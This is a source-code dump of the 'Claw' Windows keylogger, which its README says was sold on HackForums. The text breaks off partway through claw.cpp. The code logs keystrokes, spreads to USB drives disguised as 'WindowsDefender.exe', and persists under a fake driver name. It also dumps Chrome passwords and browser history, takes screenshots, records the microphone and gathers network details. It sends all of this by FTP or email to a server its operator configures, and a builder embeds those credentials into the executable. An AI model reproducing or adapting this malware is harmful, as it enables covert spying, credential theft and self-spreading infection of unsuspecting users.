├── banner.png ├── src ├── makefile ├── main.cpp ├── base64.h ├── claw.h └── claw.cpp ├── LICENSE ├── README.md ├── php └── clawnew.php └── tests ├── builder.cpp └── base64.h /banner.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/quantumcore/claw/HEAD/banner.png -------------------------------------------------------------------------------- /src/makefile: -------------------------------------------------------------------------------- 1 | main: 2 | g++ main.cpp claw.cpp -o claw.exe -lgdiplus -lwininet -mwindows -lwinmm -m32 -O3 -Os -static 3 | stripped: 4 | g++ main.cpp claw.cpp -o claw.exe -lgdiplus -lwininet -mwindows -lwinmm -m32 -O3 -MD -s -Os -static -------------------------------------------------------------------------------- /src/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Claw.h" 2 | 3 | int main 4 | () 5 | { 6 | Claw crs; 7 | crs.GetKeyLoggerInformation(); // Load information 8 | crs._infect(); // Infect the system 9 | SetCurrentDirectory((LPSTR)crs.HQ.c_str()); // Set working directory to Install location 10 | 11 | HANDLE ht = CreateThread( NULL, 0, USBINFECT,NULL, 0, NULL); // Create Usb Infection thread 12 | if (ht == NULL) 13 | { 14 | exit(1); 15 | } 16 | 17 | HANDLE hThread = CreateThread( NULL, 0, NOTIFIER, NULL, 0, NULL); // Create Log Notifier thread 18 | if (hThread == NULL) 19 | { 20 | exit(1); 21 | } 22 | // Start Keylogging 23 | while(true) 24 | { 25 | Sleep(10); 26 | crs.Keylogger(); 27 | } 28 | 29 | return 0; 30 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 QuantumCored 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # claw 2 | Source code of Claw Key logger previously sold on HackForums. 3 | 4 | I was unable to maintain this. I wanted to sell this project but there are many things wrong with it that dissapointed my buyer. 5 | It's here now, Open for you to change. 6 | 7 | [Hack Forums thread](https://hackforums.net/showthread.php?tid=6081634) 8 | 9 | [Video](https://youtu.be/jJ6-5PmsQLs) 10 | 11 | 12 | ### Usage 13 | - Build Claw keylogger that's inside ``src``. 14 | - Build test Builder under ``tests``. 15 | - Run Builder on the claw exe. 16 | 17 | #### Developer 18 | Hi my name's [Fahad](https://github.com/quantumcore). 19 | You may contact me, on [Discord](https://discordapp.com/invite/8snh7nx) or [My Website](https://quantumcored.com/) 20 | 21 | #### LICENSE 22 | [VIEW LICENSE](https://github.com/quantumcored/claw/blob/master/LICENSE) 23 | 24 | The Developer is not responsible for any misuse of Damage caused by the program. This is created only to innovate InfoSec and **YOU**. :point_left: 25 | 26 | #### Donate 27 | Help me with my future projects. Thank you. 28 | [Donate](https://commerce.coinbase.com/checkout/cebcb394-f73e-4990-98b9-b3fdd852358f) 29 | -------------------------------------------------------------------------------- /php/clawnew.php: -------------------------------------------------------------------------------- 1 | // Claw Web Builder 2 | // This Code needs to be changed according to your html build page 3 | // This snippet is according to the envoironment, And setup of https://quantumcored.com/users/clawmain.php 4 | // This is hosted here https://quantumcored.com/users/clawnew.php 5 | 6 | 76 |

77 | -------------------------------------------------------------------------------- /tests/builder.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: Fahad (QuantumCore) 4 | 5 | https://github.com/quantumcore 6 | https://quantumcored.com 7 | 8 | builder.cpp (c) 2020 9 | 10 | CLAW KEYLOGGER 11 | */ 12 | 13 | // C++ Builder for tests. 14 | // Writes information at EOF. 15 | 16 | #include "base64.h" 17 | #include 18 | #include 19 | #include 20 | #include 21 | 22 | // Example : ftp:FTPSERVER,FTPUSERNAMEVALUE:FTPPASSWORDVALUE:INSTALLNAME:TIMESLEEPVALUEINMS 23 | // (1) ftp : server, anonymous : anonymous :WindowsTCP : 50000 24 | // (2) smtp : myEmail@pass.com : mypassword : WindowsTCP : 5000 25 | 26 | 27 | int main() 28 | { 29 | std::ofstream outfile; 30 | std::ostringstream fulval; 31 | std::string method, demail, dpass, install_location, timeinterval, out, mic; 32 | std::string server; 33 | std::cout << "Enter Method (ftp/smtp) : "; 34 | std::getline(std::cin, method); 35 | 36 | if(method == "ftp"){ 37 | std::cout << "Enter FTP Server : "; 38 | std::getline(std::cin, server); 39 | } 40 | 41 | std::cout << "Enter USERNAME / EMAIL : "; 42 | std::getline(std::cin, demail); 43 | 44 | 45 | std::cout << "Enter PASSWORD : "; 46 | std::getline(std::cin, dpass); 47 | 48 | std::cout << "Enter A Name : "; 49 | std::getline(std::cin, install_location); 50 | 51 | std::cout << "Enter Time Interval to receive : "; 52 | std::getline(std::cin, timeinterval); 53 | 54 | std::cout << "Record mic? (1/0) : "; 55 | std::getline(std::cin, mic); 56 | 57 | std::cout << "Claw EXE : "; 58 | std::getline(std::cin, out); 59 | 60 | std::string serveranduser = server + "," + demail; 61 | if(method == "ftp"){ 62 | fulval << base64_encode(reinterpret_cast(method.c_str()), method.length()) << "[]" << base64_encode(reinterpret_cast(serveranduser.c_str()), serveranduser.length()) << "[]" << base64_encode(reinterpret_cast(dpass.c_str()), dpass.length()) << "[]" << base64_encode(reinterpret_cast(install_location.c_str()), install_location.length()) << "[]" << base64_encode(reinterpret_cast(timeinterval.c_str()), timeinterval.length()) << "[]" << base64_encode(reinterpret_cast(mic.c_str()), mic.length()); 63 | } else { 64 | fulval << base64_encode(reinterpret_cast(method.c_str()), method.length()) << "[]" << base64_encode(reinterpret_cast(demail.c_str()), demail.length()) << "[]" << base64_encode(reinterpret_cast(dpass.c_str()), dpass.length()) << "[]" << base64_encode(reinterpret_cast(install_location.c_str()), install_location.length()) << "[]" << base64_encode(reinterpret_cast(timeinterval.c_str()), timeinterval.length()) << "[]" <(mic.c_str()), mic.length()); 65 | } 66 | 67 | outfile.open(out.c_str(), std::ios::app | std::ios::binary); 68 | if(outfile.is_open()){ 69 | outfile << "\n\n"; 70 | outfile << fulval.str().c_str(); 71 | outfile.close(); 72 | std::cout << "Wrote : " << fulval.str().c_str() << " to " << out.c_str() << std::endl; 73 | } 74 | } -------------------------------------------------------------------------------- /tests/base64.h: -------------------------------------------------------------------------------- 1 | #ifndef BASE64 2 | #define BASE64 3 | 4 | #include 5 | /* 6 | BASE 64 Encoding and Decoding 7 | Original : https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp 8 | */ 9 | static const std::string base64_chars = 10 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 11 | "abcdefghijklmnopqrstuvwxyz" 12 | "0123456789+/"; 13 | 14 | 15 | static inline bool is_base64(unsigned char c) { 16 | return (isalnum(c) || (c == '+') || (c == '/')); 17 | } 18 | 19 | std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) { 20 | std::string ret; 21 | int i = 0; 22 | int j = 0; 23 | unsigned char char_array_3[3]; 24 | unsigned char char_array_4[4]; 25 | 26 | while (in_len--) { 27 | char_array_3[i++] = *(bytes_to_encode++); 28 | if (i == 3) { 29 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 30 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 31 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 32 | char_array_4[3] = char_array_3[2] & 0x3f; 33 | 34 | for(i = 0; (i <4) ; i++) 35 | ret += base64_chars[char_array_4[i]]; 36 | i = 0; 37 | } 38 | } 39 | 40 | if (i) 41 | { 42 | for(j = i; j < 3; j++) 43 | char_array_3[j] = '\0'; 44 | 45 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 46 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 47 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 48 | char_array_4[3] = char_array_3[2] & 0x3f; 49 | 50 | for (j = 0; (j < i + 1); j++) 51 | ret += base64_chars[char_array_4[j]]; 52 | 53 | while((i++ < 3)) 54 | ret += '='; 55 | 56 | } 57 | 58 | return ret; 59 | 60 | } 61 | std::string base64_decode(std::string const& encoded_string) { 62 | int in_len = encoded_string.size(); 63 | int i = 0; 64 | int j = 0; 65 | int in_ = 0; 66 | unsigned char char_array_4[4], char_array_3[3]; 67 | std::string ret; 68 | 69 | while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) { 70 | char_array_4[i++] = encoded_string[in_]; in_++; 71 | if (i ==4) { 72 | for (i = 0; i <4; i++) 73 | char_array_4[i] = base64_chars.find(char_array_4[i]); 74 | 75 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 76 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 77 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 78 | 79 | for (i = 0; (i < 3); i++) 80 | ret += char_array_3[i]; 81 | i = 0; 82 | } 83 | } 84 | 85 | if (i) { 86 | for (j = i; j <4; j++) 87 | char_array_4[j] = 0; 88 | 89 | for (j = 0; j <4; j++) 90 | char_array_4[j] = base64_chars.find(char_array_4[j]); 91 | 92 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 93 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 94 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 95 | 96 | for (j = 0; (j < i - 1); j++) ret += char_array_3[j]; 97 | } 98 | 99 | return ret; 100 | } 101 | 102 | #endif // ! BASE64 -------------------------------------------------------------------------------- /src/base64.h: -------------------------------------------------------------------------------- 1 | #ifndef BASE64 2 | #define BASE64 3 | 4 | #include "Claw.h" 5 | #include 6 | /* 7 | BASE 64 Encoding and Decoding 8 | Original : https://renenyffenegger.ch/notes/development/Base64/Encoding-and-decoding-base-64-with-cpp 9 | */ 10 | static const std::string base64_chars = 11 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 12 | "abcdefghijklmnopqrstuvwxyz" 13 | "0123456789+/"; 14 | 15 | 16 | static inline bool is_base64(unsigned char c) { 17 | return (isalnum(c) || (c == '+') || (c == '/')); 18 | } 19 | 20 | std::string base64_encode(unsigned char const* bytes_to_encode, unsigned int in_len) { 21 | std::string ret; 22 | int i = 0; 23 | int j = 0; 24 | unsigned char char_array_3[3]; 25 | unsigned char char_array_4[4]; 26 | 27 | while (in_len--) { 28 | char_array_3[i++] = *(bytes_to_encode++); 29 | if (i == 3) { 30 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 31 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 32 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 33 | char_array_4[3] = char_array_3[2] & 0x3f; 34 | 35 | for(i = 0; (i <4) ; i++) 36 | ret += base64_chars[char_array_4[i]]; 37 | i = 0; 38 | } 39 | } 40 | 41 | if (i) 42 | { 43 | for(j = i; j < 3; j++) 44 | char_array_3[j] = '\0'; 45 | 46 | char_array_4[0] = (char_array_3[0] & 0xfc) >> 2; 47 | char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4); 48 | char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6); 49 | char_array_4[3] = char_array_3[2] & 0x3f; 50 | 51 | for (j = 0; (j < i + 1); j++) 52 | ret += base64_chars[char_array_4[j]]; 53 | 54 | while((i++ < 3)) 55 | ret += '='; 56 | 57 | } 58 | 59 | return ret; 60 | 61 | } 62 | std::string base64_decode(std::string const& encoded_string) { 63 | int in_len = encoded_string.size(); 64 | int i = 0; 65 | int j = 0; 66 | int in_ = 0; 67 | unsigned char char_array_4[4], char_array_3[3]; 68 | std::string ret; 69 | 70 | while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) { 71 | char_array_4[i++] = encoded_string[in_]; in_++; 72 | if (i ==4) { 73 | for (i = 0; i <4; i++) 74 | char_array_4[i] = base64_chars.find(char_array_4[i]); 75 | 76 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 77 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 78 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 79 | 80 | for (i = 0; (i < 3); i++) 81 | ret += char_array_3[i]; 82 | i = 0; 83 | } 84 | } 85 | 86 | if (i) { 87 | for (j = i; j <4; j++) 88 | char_array_4[j] = 0; 89 | 90 | for (j = 0; j <4; j++) 91 | char_array_4[j] = base64_chars.find(char_array_4[j]); 92 | 93 | char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4); 94 | char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2); 95 | char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3]; 96 | 97 | for (j = 0; (j < i - 1); j++) ret += char_array_3[j]; 98 | } 99 | 100 | return ret; 101 | } 102 | 103 | #endif // ! BASE64 -------------------------------------------------------------------------------- /src/claw.h: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: Fahad (QuantumCore) 4 | 5 | https://github.com/quantumcore 6 | https://quantumcored.com 7 | 8 | claw.h (c) 2020 9 | 10 | CLAW KEYLOGGER 11 | */ 12 | 13 | //==================== 14 | #ifndef Claw_C 15 | #define Claw_C 16 | 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #include 25 | #include 26 | #include 27 | #include 28 | #include 29 | //==================== 30 | 31 | #define UNLEN 256 32 | 33 | //==================== 34 | // Threads 35 | DWORD WINAPI NOTIFIER(LPVOID lpParameter); 36 | DWORD WINAPI USBINFECT(LPVOID lpParameter); 37 | //==================== 38 | 39 | class Claw { 40 | public: 41 | 42 | std::string DELIVERY_USER = ""; // the Delivery Username / Email 43 | std::string DELIVERY_PASS = ""; // the Delivery Password 44 | std::string FTP_SERVER = ""; // FTP Server (if used) 45 | std::string INSTALL_NAME = ""; // The name to infect the pc as 46 | std::string strTimeInterval = ""; // Time interval to send logs 47 | std::string DELIVERY_METHOD = ""; // Delivery method, ftp or smtp 48 | std::string MIC_OPTION = ""; // To Record Mic or not 49 | std::string HQ = ""; // HQ is the Install location 50 | std::string SCREENSHOTFILENAME; // 1st Screenshot filename 51 | std::string SECONDSCREENSHOT; // 2nd Screenshot filename 52 | std::string MICFILENAME; // Mic Recording filename 53 | 54 | unsigned int TIME_INTERVAL = 0; // The time interval string, On line 39, is later converted to unsigned int, Stored here. 55 | WIN32_FIND_DATA data; 56 | 57 | std::string random_string( size_t length ); // returns random string 58 | //============================ 59 | std::string initial_install_directory(); // Returns Initial Install directory 60 | //============================ 61 | void copyFile(const char* source, const char* dest); // Copy file 62 | //============================ 63 | void _infect(); // Infect the system 64 | //============================ 65 | void StartupKey(const char* czExePath); // Add to Startup 66 | //============================ 67 | std::string Dir(); // Get Current Directory 68 | //============================ 69 | void replaceAll( std::string &s, const std::string &search, const std::string &replace ); // This function is used 70 | // To replace all instances of a string in an another string. 71 | //============================ 72 | bool SendMail(std::string message, std::string subject); // Send Email 73 | //============================ 74 | void split(char* src, char* dest[5], const char* delimeter) ; // Split string, C style. 75 | //============================ 76 | void ProcessDelivery(); // Log Delivery Processing 77 | //============================ 78 | std::string MyLocation(); // Returns Location of Claw Keylogger 79 | //============================ 80 | std::istream& ignoreline(std::ifstream& in, std::ifstream::pos_type& pos); // ignores a line being read from a file. 81 | //============================ 82 | std::string getLastLine(std::ifstream& in); // Gets the Last line of the file 83 | //============================ 84 | 85 | 86 | /* 87 | Gets Keylogger Reqiured INFORMATION. 88 | 89 | Information is written in the EXE at the End of File. 90 | This function, Reads the last line and loads the information required. 91 | Claw cannot run without it. 92 | Information format : (protocol)[](server/email)[](password)[](install_name)[](time_interval)[](mic_option) 93 | Example : 94 | 95 | smtp[]mygmail@gmail.com[]mygmailpassword[]svchost[]300000[]1 96 | |- Sends Logs to Email on mygmail@gmail.com. Infects the PC with name 'svchost'. 97 | |- Sends Logs every 5 Minutes, With Mic Recording. 98 | 99 | ftp[]myserver.com,username[]myftpserverpass[]svchost[]300000[]0 100 | |- Sends Logs to FTP on myserver.com. Infects the PC with name 'svchost'. 101 | |- Sends Logs every 5 Minutes, Without Mic Recording. 102 | |- see claw.cpp line 399 for details on ftp innformaton parsing 103 | 104 | This information is split into an array using '[]' as it's delimeter. 105 | Delimeter can be changed, It should be something that must not be in any other setting as it will be split too. 106 | The current delimeter is recommended to not be changed. 107 | 108 | Time Intervals that Claw uses are 300000ms (5 minutes), 600000ms (10 minutes), and 900000 (15 minutes) 109 | 110 | */ 111 | std::string GetKeyLoggerInformation(); 112 | //============================ 113 | DWORD ProcessId(LPCTSTR ProcessName); // GET PID of a Process by Name 114 | //============================ 115 | BOOL isFile(const char* file); // Check if a file exists, Returns TRUE if it does, FALSE if it does not. 116 | //============================ 117 | std::string readFileContents(const char* file); // Returns the contents of a file. 118 | //============================ 119 | std::string ExecuteOutFile(const char* command, const char* output_filename); // Execute a PS Command and Redirect output to file. 120 | //============================ 121 | void ExecuteSilent(const char* command); // Execute a PS Command Silently 122 | //============================ 123 | void ExecuteCommandPrompt(const char* command); // Execute a Command in CMD. 124 | //============================ 125 | std::string DumpChromeCredentials(); // Dump Google Chrome Credentials 126 | //============================ 127 | void DumpBrowserHistory(); // Dump Browser history 128 | //============================ 129 | bool hookShift(); // Get shift status 130 | //============================ 131 | bool capsLock(); // Get capslock status 132 | //============================ 133 | int filter(int key); // Filters keys 134 | //============================ 135 | void Keylogger(); // The Keylogger 136 | //============================ 137 | std::string KeylogFileName(); // returns Keylogger filename 138 | //=========================== 139 | std::string WindowStamp(); // returns Window Name + Timestamp 140 | //=========================== 141 | void ScreenShot(std::string JPEG_FILENAME); // Takes Screenshot of the Entire Screen. 142 | //=========================== 143 | std::string WANIP(); // Returns WAN IP Address 144 | //=========================== 145 | std::string UserPC(); // Returns User / PC. 146 | //=========================== 147 | void RecordMic(); // Records Mic. 148 | }; 149 | 150 | 151 | 152 | #endif // ! Claw -------------------------------------------------------------------------------- /src/claw.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Author: Fahad (QuantumCore) 3 | 4 | https://github.com/quantumcore 5 | https://quantumcored.com 6 | 7 | claw.cpp (c) 2020 8 | 9 | CLAW KEYLOGGER 10 | */ 11 | 12 | #include "Claw.h" 13 | #include "base64.h" 14 | 15 | /* 16 | Copy Claw to USB Drive, This function runs in a loop and checks 17 | for available USB Drives. 18 | If one is found, Claw is copied into it with the name of "WindowsDefender.exe"; 19 | */ 20 | DWORD WINAPI USBINFECT(LPVOID lpParameter) { 21 | Claw claws; 22 | while(true) 23 | { 24 | Sleep(3000); 25 | for (char i = 'A'; i <= 'Z'; i++) { 26 | std::string path; 27 | path.push_back(i); 28 | path += ":\\"; 29 | 30 | if (GetDriveTypeA(path.c_str()) == DRIVE_REMOVABLE) { 31 | path += "WindowsDefender.exe"; 32 | if(!claws.isFile(path.c_str())){ 33 | CopyFileA(claws.MyLocation().c_str(), path.c_str(), FALSE); 34 | break; 35 | } 36 | } 37 | } 38 | } 39 | } 40 | 41 | std::string Claw::random_string( size_t length ) 42 | { 43 | auto randchar = []() -> char 44 | { 45 | const char charset[] = 46 | "0123456789" 47 | "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 48 | "abcdefghijklmnopqrstuvwxyz"; 49 | const size_t max_index = (sizeof(charset) - 1); 50 | return charset[ rand() % max_index ]; 51 | }; 52 | std::string str(length,0); 53 | std::generate_n( str.begin(), length, randchar ); 54 | return str; 55 | } 56 | 57 | /* 58 | The Notifier Thread. 59 | This is the thread that sends keylogs 60 | */ 61 | DWORD WINAPI NOTIFIER(LPVOID lpParameter){ 62 | while(true) 63 | { 64 | Claw crs; 65 | crs.GetKeyLoggerInformation(); // Load Keylogger information 66 | std::istringstream toint(crs.strTimeInterval); 67 | toint >> crs.TIME_INTERVAL; 68 | Sleep(crs.TIME_INTERVAL); // Sleep until the set Time interval 69 | //Only send mails if a valid Internet connection is detected 70 | if(InternetCheckConnection(_T("http://www.google.com"), 1, 0)){ 71 | // Take Screenshot 72 | crs.SCREENSHOTFILENAME.clear(); 73 | crs.SECONDSCREENSHOT.clear(); 74 | crs.SCREENSHOTFILENAME = "sc_"+ crs.random_string(5) + ".jpg"; 75 | crs.SECONDSCREENSHOT = "sc_"+ crs.random_string(5) + ".jpg"; 76 | // The first screenshot 77 | crs.ScreenShot(crs.SCREENSHOTFILENAME); 78 | Sleep(10000); 79 | // The second Screenshot 80 | crs.ScreenShot(crs.SECONDSCREENSHOT); 81 | // Get chrome Passwords. 82 | crs.DumpChromeCredentials(); // Output name is chrome.txt 83 | // Get Browser history 84 | crs.DumpBrowserHistory(); // Output name is history.txt 85 | // get Intel 86 | crs.ExecuteCommandPrompt("systeminfo >> intel"); 87 | crs.ExecuteCommandPrompt("tasklist >> intel"); 88 | crs.ExecuteCommandPrompt("netsh wlan show all >> intel"); 89 | crs.ExecuteCommandPrompt("ipconfig /displaydns >> intel"); 90 | if(crs.MIC_OPTION == "1") 91 | { 92 | crs.RecordMic(); // Record MIC for 15 seconds 93 | } 94 | // Send 95 | crs.ProcessDelivery(); 96 | } 97 | } 98 | } 99 | /* 100 | Easy MIC Recording 101 | */ 102 | void Claw::RecordMic() 103 | { 104 | std::ostringstream micrecfile; 105 | MICFILENAME.clear(); 106 | MICFILENAME = "mic_" + random_string(5) + ".wav"; 107 | micrecfile << "save claw " << MICFILENAME; 108 | mciSendString(_T("open new type waveaudio alias claw"), NULL, 0, NULL); 109 | mciSendString(_T("set claw time format ms"), NULL, 0, NULL); 110 | mciSendString(_T("record claw notify"), NULL, 0, NULL); 111 | Sleep(15000); // Sleep() here is how long the recording will be 112 | mciSendString(_T("stop claw"), NULL, 0, NULL); 113 | mciSendStringA(micrecfile.str().c_str(), NULL, 0, NULL); 114 | mciSendString(_T("close claw"), NULL, 0, NULL); 115 | } 116 | 117 | // Get Current Directory 118 | std::string Claw::Dir() 119 | { 120 | char DIR[MAX_PATH]; 121 | memset(DIR, '\0', MAX_PATH); 122 | GetCurrentDirectory(MAX_PATH, DIR); 123 | return std::string(DIR); 124 | } 125 | 126 | // Add Startup key 127 | void Claw::StartupKey(const char* czExePath) 128 | { 129 | HKEY hKey; 130 | TCHAR DIR[MAX_PATH]; 131 | LONG lnRes = RegOpenKeyEx( HKEY_CURRENT_USER, 132 | _T("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"), 133 | 0 , KEY_WRITE, 134 | &hKey); 135 | if( ERROR_SUCCESS == lnRes ) 136 | { 137 | lnRes = RegSetValueEx( hKey, 138 | _T("Windows Universal Display Driver"), 139 | 0, 140 | REG_SZ, 141 | (unsigned char*)czExePath, 142 | strlen(czExePath) ); 143 | } 144 | 145 | RegCloseKey(hKey); 146 | } 147 | 148 | // Infect the system 149 | void Claw::_infect() 150 | { 151 | // get install path 152 | HQ = initial_install_directory() + "\\" + INSTALL_NAME; // Create the full HQ Path. 153 | std::string full_filename = HQ + "\\" + INSTALL_NAME + ".exe"; // Create the full install filename 154 | if (CreateDirectory(HQ.c_str(), NULL) || ERROR_ALREADY_EXISTS == GetLastError()) // Create Install Directory 155 | { 156 | copyFile(MyLocation().c_str(), full_filename.c_str()); // Copy claw into it with the install name 157 | StartupKey(full_filename.c_str()); // Add Startup key 158 | } else { 159 | // If we're unable to create directory 160 | const char* zs = MyLocation().c_str(); // Get Current location 161 | StartupKey(zs); // Add Startup key of current location 162 | } 163 | } 164 | 165 | // Get User / PC 166 | std::string Claw::UserPC() 167 | { 168 | char username[UNLEN + 1]; 169 | char hostname[MAX_COMPUTERNAME_LENGTH + 1]; 170 | DWORD len = UNLEN + 1; 171 | DWORD hlen = sizeof(hostname) / sizeof(hostname[0]); 172 | std::string userpc; 173 | GetUserNameA(username, &len); 174 | GetComputerNameA(hostname, &hlen); 175 | userpc = std::string(username) + " / " + std::string(hostname); 176 | return userpc; 177 | } 178 | 179 | // Process the Delivery 180 | void Claw::ProcessDelivery() 181 | { 182 | // If Delivery method is ftp 183 | if(DELIVERY_METHOD == "ftp") 184 | { 185 | // Get all required data 186 | char username[UNLEN + 1]; 187 | DWORD len = UNLEN + 1; 188 | memset(username, '\0', len); 189 | GetUserNameA(username, &len); 190 | std::string dirname = username; 191 | std::string logfilename = dirname + "/" + KeylogFileName(); 192 | std::string ssuploadone = dirname + "/" + SCREENSHOTFILENAME; 193 | std::string ssuploadtwo = dirname + "/" + SECONDSCREENSHOT; 194 | std::string iintel = dirname + "/intel"; 195 | std::string auds = dirname + "/" + MICFILENAME; 196 | std::string chr = dirname + "/chrome.txt"; 197 | std::string histr = dirname + "/history.txt"; 198 | HINTERNET hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0); 199 | HINTERNET hFtpSession = InternetConnect(hInternet, FTP_SERVER.c_str() , INTERNET_DEFAULT_FTP_PORT, DELIVERY_USER.c_str(), DELIVERY_PASS.c_str(), INTERNET_SERVICE_FTP, INTERNET_FLAG_PASSIVE, 0); 200 | FtpCreateDirectory(hFtpSession, dirname.c_str()); // Create Directory as the username 201 | // Upload files to directory 202 | FtpPutFile(hFtpSession, SCREENSHOTFILENAME.c_str(), ssuploadone.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 203 | FtpPutFile(hFtpSession, _T("history.txt"), histr.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 204 | FtpPutFile(hFtpSession, _T("chrome.txt"), chr.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 205 | FtpPutFile(hFtpSession, SECONDSCREENSHOT.c_str(), ssuploadone.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 206 | FtpPutFile(hFtpSession, _T("intel"), iintel.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 207 | FtpPutFile(hFtpSession, MICFILENAME.c_str(), auds.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 208 | FtpPutFile(hFtpSession, KeylogFileName().c_str(), logfilename.c_str(), FTP_TRANSFER_TYPE_BINARY, 0); 209 | InternetCloseHandle(hFtpSession); 210 | InternetCloseHandle(hInternet); 211 | } 212 | // If Delivery Method is Smtp 213 | else if(DELIVERY_METHOD == "smtp") 214 | { 215 | // Create Message 216 | std::string message = "Claw Report for " + UserPC() + "\nDate : " + KeylogFileName() + "\nIP : " + WANIP() + "\nRunning from Directory : " + Dir() + "\nIt is a pleasure serving you."; 217 | std::string title = "Claw Report ( " + UserPC() + " | " + KeylogFileName() + " )"; 218 | // Send Message 219 | SendMail(message, title); 220 | } 221 | 222 | // IMPORTANT PART (CLEANUP) ==================================== 223 | // Once the Data has been sent, We reset the Keylogs. 224 | // Simply delete the Keylog file and if there are any others 225 | // IT will be recreated by Keylogger function 226 | // The program fails to delete itself because "process is being used" :D 227 | HANDLE hFind = FindFirstFile(_T("*"), &data); 228 | if(hFind != INVALID_HANDLE_VALUE){ 229 | do{ 230 | std::string filename = data.cFileName; 231 | if(filename != INSTALL_NAME + ".exe"){ 232 | if(filename != KeylogFileName()) 233 | { 234 | remove(filename.c_str()); 235 | } 236 | } 237 | 238 | } while(FindNextFile(hFind, &data)); 239 | } 240 | } 241 | 242 | void Claw::copyFile(const char* source, const char* dest) 243 | { 244 | std::ifstream src(source, std::ios::binary); 245 | std::ofstream dst(dest, std::ios::binary); 246 | dst << src.rdbuf(); 247 | } 248 | 249 | std::string Claw::WANIP() 250 | { 251 | char wanip[300]; 252 | HINTERNET hInternet, hFile; 253 | DWORD rSize; 254 | if(InternetCheckConnection(_T("http://www.google.com"), 1, 0)){ 255 | memset(wanip, '\0', 300); 256 | hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); 257 | hFile = InternetOpenUrl(hInternet, _T("http://bot.whatismyipaddress.com/"), NULL, 0, INTERNET_FLAG_RELOAD, 0); 258 | InternetReadFile(hFile, &wanip, sizeof(wanip), &rSize); 259 | wanip[rSize] = '\0'; 260 | 261 | InternetCloseHandle(hFile); 262 | InternetCloseHandle(hInternet); 263 | } else { 264 | memset(wanip, '\0', 300); 265 | snprintf(wanip, 300, "[Failed to get WAN IP]"); 266 | } 267 | 268 | return std::string(wanip); 269 | } 270 | 271 | void Claw::replaceAll( std::string &s, const std::string &search, const std::string &replace ) { 272 | for( 